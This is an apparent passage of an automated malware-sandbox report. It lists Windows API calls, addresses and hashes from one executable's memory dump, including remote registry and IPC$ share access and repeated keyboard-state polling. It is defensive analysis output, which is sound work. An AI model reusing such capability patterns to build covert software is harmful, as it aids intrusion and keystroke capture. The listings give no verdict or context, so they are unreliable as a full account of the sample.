                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24415A72800249ABCB05EBE5DD86DEFB778EF18340F500165B505B20A2EB756F49EBB1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00D41093
                                                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00D410AF
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00D410CB
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00D410F5
                                                                                                                                                                                                                                                                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00D4111D
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D41128
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D4112D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                  • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                  • Opcode ID: 6f3a328bb8b148eb3101bc7d65544e26e9ff5410f13681dc2510c9962ae5981d
                                                                                                                                                                                                                                                                  • Instruction ID: 3572bb0da679b1080cc7fe515b91e59874c25e3d457827f0fe6a51df4390f367
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f3a328bb8b148eb3101bc7d65544e26e9ff5410f13681dc2510c9962ae5981d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C410676C10269ABCF11EBA4DC85DEEB778FF18750F044129E905A32A0EB319E48DB60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00D74AD9
                                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00D74AE0
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00D74AF3
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00D74AFB
                                                                                                                                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D74B06
                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00D74B10
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00D74B1A
                                                                                                                                                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00D74B30
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00D74B3C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                  • String ID: static
                                                                                                                                                                                                                                                                  • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                  • Opcode ID: 8feb52b19b2f0f250fb05dae2ac2eba89174d920ad22ba8da45bd9e1f7d0aef5
                                                                                                                                                                                                                                                                  • Instruction ID: e5d39136e731c84e35167b0b670b735ed6e57b55725fc307ac0ffe6dea6f8da4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8feb52b19b2f0f250fb05dae2ac2eba89174d920ad22ba8da45bd9e1f7d0aef5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9314B32140219ABDF129F64DC09FDA3BAAFF09324F154211FA19E61A0E735D850DBB4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00D646B9
                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00D646E7
                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00D646F1
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6478A
                                                                                                                                                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00D6480E
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00D64932
                                                                                                                                                                                                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00D6496B
                                                                                                                                                                                                                                                                  • CoGetObject.OLE32(?,00000000,00D80B64,?), ref: 00D6498A
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00D6499D
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00D64A21
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00D64A35
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 429561992-0
                                                                                                                                                                                                                                                                  • Opcode ID: dba2c69569d46d19716445c710e18005a1d2c2bf8e6a5df1b74a20dff426117d
                                                                                                                                                                                                                                                                  • Instruction ID: 6bacffeb72cfdef8ab22be9462b795b66a0b984d8591c5a4ef96884f8a301ece
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dba2c69569d46d19716445c710e18005a1d2c2bf8e6a5df1b74a20dff426117d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAC13371608301AFC700DF68C88492BBBE9FF89748F14491DF98A9B210DB30ED45CBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00D58538
                                                                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00D585D4
                                                                                                                                                                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00D585E8
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00D80CD4,00000000,00000001,00DA7E8C,?), ref: 00D58634
                                                                                                                                                                                                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00D586B9
                                                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 00D58711
                                                                                                                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00D5879C
                                                                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00D587BF
                                                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00D587C6
                                                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00D5881B
                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00D58821
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                  • Opcode ID: 012738d3408dee30bf0d559db9686eaf9ca2adfb373c7794d11a7299e8cc55ff
                                                                                                                                                                                                                                                                  • Instruction ID: de39eab25ddbe1c7e627a1f4235ddb97a6fc20c2d08cbbdd50aeac0f5f4974e3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 012738d3408dee30bf0d559db9686eaf9ca2adfb373c7794d11a7299e8cc55ff
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3C10C75A00205AFCB14DFA5C884DAEBBF5FF48345B148499E81AEB361DB30ED45DBA0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00D4039F
                                                                                                                                                                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00D403F8
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00D4040A
                                                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D4042A
                                                                                                                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00D4047D
                                                                                                                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00D40491
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00D404A6
                                                                                                                                                                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00D404B3
                                                                                                                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D404BC
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00D404CE
                                                                                                                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D404D9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                  • Opcode ID: fb82109768910dc25a4c43bf48a983ef3e556ac703816a96dacb1fef40b8ef85
                                                                                                                                                                                                                                                                  • Instruction ID: 79fe929e8fce447b3498363edaa4b5d5e7bf1c6b6bcddae103f22dd728b3efa4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb82109768910dc25a4c43bf48a983ef3e556ac703816a96dacb1fef40b8ef85
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74415035A002199FCB10DFA4D8489AE7FB9EF48354F008469EA59E7361D734A945CBB0
APIs
• GetKeyboardState.USER32(?), ref: 00D4A65D
• GetAsyncKeyState.USER32(000000A0), ref: 00D4A6DE
• GetKeyState.USER32(000000A0), ref: 00D4A6F9
• GetAsyncKeyState.USER32(000000A1), ref: 00D4A713
• GetKeyState.USER32(000000A1), ref: 00D4A728
• GetAsyncKeyState.USER32(00000011), ref: 00D4A740
• GetKeyState.USER32(00000011), ref: 00D4A752
• GetAsyncKeyState.USER32(00000012), ref: 00D4A76A
• GetKeyState.USER32(00000012), ref: 00D4A77C
• GetAsyncKeyState.USER32(0000005B), ref: 00D4A794
• GetKeyState.USER32(0000005B), ref: 00D4A7A6
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 5edbffc6ee0674c517554738233eb6df2395717dc05561de6d900df22940bb74
• Instruction ID: a74e6af5a256f461a0db0f6cedde8ed41872adfe02ecbfdc955437d98626981b
• Opcode Fuzzy Hash: 5edbffc6ee0674c517554738233eb6df2395717dc05561de6d900df22940bb74
• Instruction Fuzzy Hash: 38419464584BC96BFF31976888043A5BEB16F12348F0C805AD5C65A6C2EB949DC8C7B3
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: _wcslen$BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 707087890-567219261
• Opcode ID: f7fe22e81483056a61343d36f864b27cf97f139d8ca9ec5a9e9b251528a04481
• Instruction ID: 0650f01ed4aa28b2e1e78cad4139827d08ff95f0a2e27360e0ea603c5b479094
• Opcode Fuzzy Hash: f7fe22e81483056a61343d36f864b27cf97f139d8ca9ec5a9e9b251528a04481
• Instruction Fuzzy Hash: 3251D531A001169BCB14DF69C9609BEF3B9BF65360B24422AF866E7384DB31DE41D7B0
APIs
• CoInitialize.OLE32 ref: 00D641D1
• CoUninitialize.OLE32 ref: 00D641DC
• CoCreateInstance.OLE32(?,00000000,00000017,00D80B44,?), ref: 00D64236
• IIDFromString.OLE32(?,?), ref: 00D642A9
• VariantInit.OLEAUT32(?), ref: 00D64341
• VariantClear.OLEAUT32(?), ref: 00D64393
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
• Opcode ID: b1dee99ba52bfdd7fa51214da9dcdc86a2f74c8eadbc490bc8544f0a28995bbf
• Instruction ID: 417b6a557ea8c29d70a39bb141389193b3dee0362bf6e94cd8b2282f1e61500b
• Opcode Fuzzy Hash: b1dee99ba52bfdd7fa51214da9dcdc86a2f74c8eadbc490bc8544f0a28995bbf
• Instruction Fuzzy Hash: AE619E71608701EFC310DF64C889B6ABBE4EF49714F140909F9859B2A1DB70ED88CBB6
APIs
• GetLocalTime.KERNEL32(?), ref: 00D58C9C
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00D58CAC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D58CB8
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D58D55
• SetCurrentDirectoryW.KERNEL32(?), ref: 00D58D69
• SetCurrentDirectoryW.KERNEL32(?), ref: 00D58D9B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00D58DD1
• SetCurrentDirectoryW.KERNEL32(?), ref: 00D58DDA
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local$System
• String ID: *.*
• API String ID: 1464919966-438819550
• Opcode ID: 7b4646ad621c0b87c776c9e31f89fad47fce48ae4cd2ced62e587117faec8eb4
• Instruction ID: eb299639638419660304ea5f1bbb110338db84800ec9de87aac68f1bfe297442
• Opcode Fuzzy Hash: 7b4646ad621c0b87c776c9e31f89fad47fce48ae4cd2ced62e587117faec8eb4
• Instruction Fuzzy Hash: 21616972504345AFCB10EF60C8859AEB3E9FF99310F04481EF989D7251EB35E949DBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateMenu.USER32 ref: 00D74715
                                                                                                                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00D74724
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D747AC
                                                                                                                                                                                                                                                                  • IsMenu.USER32(?), ref: 00D747C0
                                                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00D747CA
                                                                                                                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D747F7
                                                                                                                                                                                                                                                                  • DrawMenuBar.USER32 ref: 00D747FF
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                  • String ID: 0$F
                                                                                                                                                                                                                                                                  • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00D428B1
                                                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 00D428BC
                                                                                                                                                                                                                                                                  • GetParent.USER32 ref: 00D428D8
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D428DB
                                                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00D428E4
                                                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00D428F8
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D428FB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00D42990
                                                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 00D4299B
                                                                                                                                                                                                                                                                  • GetParent.USER32 ref: 00D429B7
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D429BA
                                                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00D429C3
                                                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00D429D7
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D429DA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00D74539
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00D7453C
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D74563
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D74586
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00D745FE
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00D74648
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00D74663
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00D7467E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00D74692
